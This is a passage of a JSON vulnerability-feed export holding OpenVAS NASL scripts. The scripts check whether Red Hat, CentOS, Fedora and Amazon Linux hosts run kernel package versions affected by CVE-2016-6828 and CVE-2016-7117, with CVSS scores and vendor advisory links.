NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T14:28:39", "references": ["https://alas.aws.amazon.com/ALAS-2016-740.html"], "pluginID": "1361412562310120729", "description": "Amazon Linux Local Security Checks", "edition": 5, "reporter": "This script is Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-10-26T00:00:00", "title": "Amazon Linux Local Check: alas-2016-740", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6828"], "modified": "2018-10-01T00:00:00", "id": "OPENVAS:1361412562310120729", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120729", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2016-740.nasl 11703 2018-10-01 08:05:31Z cfischer $\n#\n# Amazon Linux security check\n#\n# Authors:\n# Autogenerated by alas-generator developed by Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120729\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:23 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: alas-2016-740\");\n script_tag(name:\"insight\", value:\"A use after free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions.\");\n script_tag(name:\"solution\", value:\"Run yum update kernel to update your system. You will need to reboot your system in order for the new kernel to be running.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-740.html\");\n script_cve_id(\"CVE-2016-6828\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.4.19~29.55.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.4.19~29.55.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~4.4.19~29.55.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.4.19~29.55.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~4.4.19~29.55.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~4.4.19~29.55.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-tools-devel\", rpm:\"kernel-tools-devel~4.4.19~29.55.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.4.19~29.55.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~4.4.19~29.55.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.4.19~29.55.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~4.4.19~29.55.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~4.4.19~29.55.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:45:42", "references": ["2016-5e24d8c350", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TURJCX6L7HMFUENGEENRRLL7FKIWB2OF"], "pluginID": "1361412562310809179", "description": "Check the version of kernel", "edition": 4, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-08-26T00:00:00", "title": "Fedora Update for kernel FEDORA-2016-5e24d8c350", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6828"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310809179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809179", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-5e24d8c350\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809179\");\n script_version(\"$Revision: 6631 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:36:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-26 05:50:35 +0200 (Fri, 26 Aug 2016)\");\n script_cve_id(\"CVE-2016-6828\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-5e24d8c350\");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel meta package\n\");\n script_tag(name: \"affected\", value: \"kernel on Fedora 24\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2016-5e24d8c350\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TURJCX6L7HMFUENGEENRRLL7FKIWB2OF\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.6.7~300.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:48:04", "references": ["https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5GNL62PWWP2XCVMWM75EIDM2DLYTMPGM", "2016-723350dd75"], "pluginID": "1361412562310809178", "description": "Check the version of kernel", "edition": 4, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-08-26T00:00:00", "title": "Fedora Update for kernel FEDORA-2016-723350dd75", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6828"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310809178", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809178", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-723350dd75\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809178\");\n script_version(\"$Revision: 6631 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:36:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-26 05:50:30 +0200 (Fri, 26 Aug 2016)\");\n script_cve_id(\"CVE-2016-6828\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-723350dd75\");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel meta package\n\");\n script_tag(name: \"affected\", value: \"kernel on Fedora 23\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2016-723350dd75\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5GNL62PWWP2XCVMWM75EIDM2DLYTMPGM\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.6.7~200.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:48:42", "references": ["http://lists.centos.org/pipermail/centos-announce/2016-December/022182.html", "2016:2962"], "pluginID": "1361412562310882614", "description": "Check the version of kernel", "edition": 4, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-12-21T00:00:00", "title": "CentOS Update for kernel CESA-2016:2962 centos5 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310882614", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882614", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2016:2962 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882614\");\n script_version(\"$Revision: 6658 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:51:48 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-21 05:44:54 +0100 (Wed, 21 Dec 2016)\");\n script_cve_id(\"CVE-2016-7117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2016:2962 centos5 \");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help \nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel packages contain the Linux \nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg\nsubsystem. This may allows remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117,\nImportant)\n\nBug Fix(es):\n\n* Previously, guest virtual machines (VMs) on a Hyper-V server cluster got\nin some cases rebooted during the graceful node failover test, because the\nhost kept sending heartbeat packets independently of guests responding to\nthem. This update fixes the bug by properly responding to all the heartbeat\nmessages in the queue, even if they are pending. As a result, guest VMs no\nlonger get rebooted under the described circumstances. (BZ#1391167)\n\");\n script_tag(name: \"affected\", value: \"kernel on CentOS 5\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"CESA\", value: \"2016:2962\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2016-December/022182.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~417.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~417.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~417.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~417.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~417.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~417.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~417.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~417.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~417.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~417.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-23T15:09:53", "references": ["https://www.redhat.com/archives/rhsa-announce/2016-December/msg00022.html", "2016:2962-01"], "pluginID": "1361412562310871730", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-12-21T00:00:00", "title": "RedHat Update for kernel RHSA-2016:2962-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871730", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871730", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2016:2962-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871730\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-21 05:44:26 +0100 (Wed, 21 Dec 2016)\");\n script_cve_id(\"CVE-2016-7117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2016:2962-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A use-after-free vulnerability was found in the kernels socket recvmmsg\nsubsystem. This may allows remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117,\nImportant)\n\nBug Fix(es):\n\n * Previously, guest virtual machines (VMs) on a Hyper-V server cluster got\nin some cases rebooted during the graceful node failover test, because the\nhost kept sending heartbeat packets independently of guests responding to\nthem. This update fixes the bug by properly responding to all the heartbeat\nmessages in the queue, even if they are pending. As a result, guest VMs no\nlonger get rebooted under the described circumstances. (BZ#1391167)\");\n script_tag(name:\"affected\", value:\"kernel on\n Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:2962-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-December/msg00022.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~417.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:48:01", "references": ["2016-2e5ebfed6d", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BKRCZ4MFYMHSC2OUN27IALXPL5Y3PDJH"], "pluginID": "1361412562310809207", "description": "Check the version of kernel", "edition": 4, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-09-07T00:00:00", "title": "Fedora Update for kernel FEDORA-2016-2e5ebfed6d", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310809207", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809207", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-2e5ebfed6d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809207\");\n script_version(\"$Revision: 6631 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:36:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-07 10:08:47 +0530 (Wed, 07 